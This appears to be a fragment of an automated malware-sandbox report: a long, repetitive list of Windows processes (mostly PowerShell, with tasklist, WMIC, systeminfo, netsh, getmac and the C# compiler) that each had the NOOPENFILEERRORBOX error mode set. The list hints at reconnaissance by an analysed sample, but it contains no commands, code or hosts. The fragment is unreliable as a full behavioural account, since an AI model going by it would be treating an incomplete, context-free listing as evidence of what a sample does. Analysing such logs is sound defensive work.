Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\systeminfo.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\getmac.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
